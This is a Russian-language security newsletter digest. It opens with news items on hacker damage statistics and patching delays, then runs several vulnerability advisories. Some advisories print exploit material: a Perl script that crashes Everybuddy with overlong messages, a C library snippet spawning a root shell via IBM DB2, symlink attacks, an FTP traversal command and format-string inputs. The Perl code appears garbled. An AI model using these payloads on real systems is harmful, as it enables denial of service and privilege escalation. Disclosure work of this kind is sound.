Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Ущерб от хакеров уменьшается
8 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакерПроведенный недавно Институтом компьютерной безопасности (ИКБ) и Федеральным бюро расследований (ФБР) совместный опрос показал, что хакерские атаки на американские компании и другие организации нанесли за минувший год по сравнению с предыдущим вдвое меньший финансовый урон. Одновременно снизилось с 60% до 56% и число фирм, отметивших несанкционированное использование своих систем.
Нынешнее исследование продемонстрировало также, что большинство компаний по-прежнему не торопятся извещать правоохранительные органы о взломах и атаках. После обнаружения подобных инцидентов только 30% опрошенных сообщили о них властям, тогда как год назад этот показатель составлял 34%. Подобная пассивность имеет под собой две основные причины: боязнь неблагоприятного общественного мнения и опасения, что этой информацией воспользуются в своих целях конкуренты.
Чаще всего, как и раньше, отмечаются сетевые атаки, вирусы, нецелевое использование блокнотных ПК и несанкционированный доступ. О поражении вирусами в опросе сказали целых 82% респондентов, что, впрочем, меньше прошлогодних 85%. Но самым поразительным результатом опроса стало резкое снижение ожидаемого финансового ущерба от атак.
В этом году 530 обследованных организаций сообщили о потере 201,8 млн. долл., тогда как в прошлом 503 респондента не досчитались 455,8 млн.
К исследованию компьютерной преступности и безопасности, ежегодно проводимому ИКБ и ФБР, привлекаются специалисты американских корпораций, правительственных учреждений, университетов и других организаций. Нынешний опрос -- восьмой по счету.
Из результатов опроса обычно цитируется отношение числа атак, производимых изнутри организаций, к их количеству извне. Производители средств безопасности используют этот параметр, чтобы доказать необходимость своей продукции.
В текущем году тенденция к повышению доли внешних сетевых атак сохранилась. Около 78% респондентов заявили, что чаще всего подвергаются нападениям через Интернет, и только 30% -- что главный вектор атак был направлен изнутри (в прошлом году это отмечало 33% опрошенных).
Опрос показал и еще один интересный результат: гораздо реже теперь упоминается несанкционированный доступ или нецелевое применение Web-узлов. Число таких упоминаний снизилось с 38% в прошлом году до 25% в нынешнем. Из тех же, кто подвергся таким атакам, 69% сообщили о пяти и менее инцидентах.
Чаще всего при этом говорили о вандализме (36%) и атаках типа "отказ от обслуживания" (35%).
0Компании делают заплаты к брешам в ПО впустую
8 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны взлом Технологии безопасности. Организации разработчики, интеграторы.Выявление дыр в том или ином ПО в большинстве случаев молниеносно вызывает появление соответствующей заплаты. Вот только пользователи очень уж небрежно относятся к их установке.
Исследование активности установки заплат провела компании Qualys. Причем главный акцент был сделан на корпоративных пользователей, от расторопности которых зависит безопасность целых сетей. В 80 процентах случаев времени достаточно для того, чтобы хакеры успели создать утилиты для атаки на ПК корпоративных пользователей. Если речь идет о некритической ошибке, то процесс установки заплат может растянуться на месяцы.
Информацией для исследования стали результаты сканирования полутора миллионов компьютерных систем, сообщает ZDNet.
1Закрытый код изобилует дырами
8 августа | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны дыра уязвимостьВ ходе последнего семинаре BlackHat, проходившего в Лас-Вегасе, была продемонстрирована утилита, которая позволяет находить уязвимости в ПО с закрытым кодом.
Ее представил Грег Хогланд. Утилита под названием Bug Scanic анализирует EXE-файлы и ищет дыры в системах их безопасности.
В ходе семинара Хогланд наглядно показал результаты сканирования нескольких популярных у пользователей всего мира программных продуктов. Результаты были шокирующими - большинство программ имеют очень низкую степень защиты.
Как считают эксперты, возможно именно эта программа заставит еще раз задуматься о выборе между патентованным ПО и софтом с открытым кодом, сообщает CNET.
2Межсайтовый скриптинг в ASPBoard
8 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость в проверке правильности входных данных обнаружена в aspBoard. Удаленный пользователь может выполнить XSS нападение.
Программное обеспечение не фильтрует HTML код, представленный пользователем, из поля URL при отправке сообщения. В результате удаленный атакующий может вставить произвольный код сценария в тело сообщения, который будет выполнен в браузере пользователя, просматривающего это сообщение.
Уязвимость обнаружена в aspBoard 1.2
Способов устранения обнаруженной уязвимости не существует в настоящее время.
3DoS против Everybuddy
8 августа | Рубрика: Дыры и патчи программ и операционных средОтказ в обслуживании обнаружен в Everybuddy. Удаленный пользователь может аварийно завершить работу клиента целевого пользователя.
Удаленный пользователь может послать специально сформированное чрезмерно длинное сообщение (примерно 1540 символов) к целевому пользователю, чтобы аварийно завершить работу целевого клиента.
Уязвимость обнаружена в Everybuddy 0.4.3
Способов устранения обнаруженной уязвимости не существует в настоящее время.
Эксплоит:
#!/usr/bin/perl use MSN; # from <http://www.adamswann.com/library/2002/msn-perl/> http://www.adamswann.com/library/2002/msn-perl/ my $client = MSN->new(); $client->connect('email address', 'password', '', { Status => \&Status, Answer => \&Answer, Message => \&Message, Join => \&Join } ); sub Status { my ($self, $username, $newstatus) = @_; print "Status() called with parameters:\n"; print " " . join(",", @_), "\n"; # Print the status change info. print "${username}'s status changed from " . $self->buddystatus($username) . " to $newstatus.\n"; # Initiate the call. $self->call($username); # The call may take a few seconds to complete, so we can't # immediately send messages. Let's put the message in a # FIFO (queue) that is keyed by username. push (@{$queue{$username}}, "Glad to see you online!"); } sub Message { my ($self, $username, undef, $msg) = @_; print "Message() called with parameters:\n"; print " " . join(",", @_), "\n"; sub Join { my ($self, $username) = @_; print "Join() called with parameters:\n"; print " " . join(",", @_), "\n"; # See if there's anything queued up. # Deliver each message if there is stuff in the queue for this user. while ($_ = shift @{$queue{$username}}) { $$self->sendmsg($_); } sub Answer { my ($self, $username) = @_; print "Answer() called with parameters:\n"; print " " . join(",", @_), "\n"; # Send a hello message. $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);4
Локальный пользователь с bin привилегиями может получить root привилегии в IBM DB2
8 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обнаружена в базе данных IBM DB2. Локальный пользователь с ‘bin’ привилегиями может получить root привилегии на системе.
Локальный пользователь с ‘bin’ привилегиями пользователь может сконструировать ‘so’ библиотеку в lib каталоге базы данных ('/usr/IBMdb2/V7.1/lib' в IBM DB2 7.1 и '/opt/IBM/db2/V8.1/lib' в IBM DB2 8.1). Пример:
#include <stdio.h> #include <string.h> _init() { printf("en el _init()\n"); printf("Con PID=%i y EUID=%i",getpid(),getuid()); system("/bin/bash"); printf("Saliendo del Init()\n");Затем, когда будет запущенна база данных, произвольный код в библиотеке будет выполнен с root привилегиями.
Уязвимость обнаружена в IBM DB2 7.1, 8.1 и возможно другие версии
Способов устранения обнаруженной уязвимости не существует в настоящее время.
5Запись произвольных файлов с root привилегиями в IBM DB2 'db2job'
8 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обнаружена в базе данных IBM DB2 в 'db2job' приложении. Локальный пользователь с некоторыми привилегиями может получить root доступ в системе.
Локальный пользователь с привилегиями на выполнение 'db2job', может записать произвольные root-owned файлы с 770 разрешениями (read/write/execute для root).
Как сообщается, './db2as/sqllib/adm/db2job' не понижает привилегии перед записью лог файлов и также создает следующие root-owned файлы:
-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobht.prf -rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobht.bak -rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobsm.bak -rwxrwx--- 1 root db2asgrp /home/db2as/sqllib/0_1.outЛокальный пользователь может сконструировать символьные ссылки с критического файла на системе к '0_1.out' файлу. Затем, когда запустится 'db2job', ссылающийся файл будет перезаписан с root привилегиями.
Уязвимость обнаружена в IBM DB2 7.1
6Поднятие локальных привилегий в ECLiPt Roaster
8 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обанружена в ECLiPt Roaster (ERoaster), графической оболочки для cdrecord и mkisofs. Локальный пользователь может получить поднятые привилегии.
ERoaster использует небезопасные временные файлы в качестве блокирующего файла. Локальный пользователь может сконструировать символьные ссылки из критического файла на системе к временному файлу. Затем, когда целевой пользователь выполняет ERoaster, ссылающийся файл может быть перезаписан с привилегиями текующего пользователя. В результате локальный пользователь может получить привилегии целевого пользователя.
Уязвимость обнаружена в ECLiPt Roaster (ERoaster) prior to 2.2.0-0.5
7Доступ к произвольным файлам вне ftp root в 121 WAM! Server
8 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость в проверке правильности входных данных обнаружена в 121 WAM! Server. Удаленный авторизованный пользователь может просматривать произвольные файлы, расположенные вне root каталога FTp сервера.
Пример:
CWD /./
Уязвимость обнаружена в 121 WAM! Server 1.0.4.0
Способов устранения обнаруженной уязвимости не существует в настоящее время.
8DoS против Crob FTP Server
8 августа | Рубрика: Дыры и патчи программ и операционных средОтказ в обслуживании обнаружен в Crob FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу FTP сервера.
Удаленный пользователь сожжет переименовать файл к "con", чтобы аварийно завершить работу FTP сервера.
Также сообщается, что пользователь может войти в систему с именем пользователя '%s%s%s%s%s%s' или послать FTP команды со строкой '%s%s%s%s%s' (например dir %s%s%s%s%s%s"), чтобы аварийно завершить работу сервера.
Уязвимость обнаружена в Crob FTP Server 2.60.1
9Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||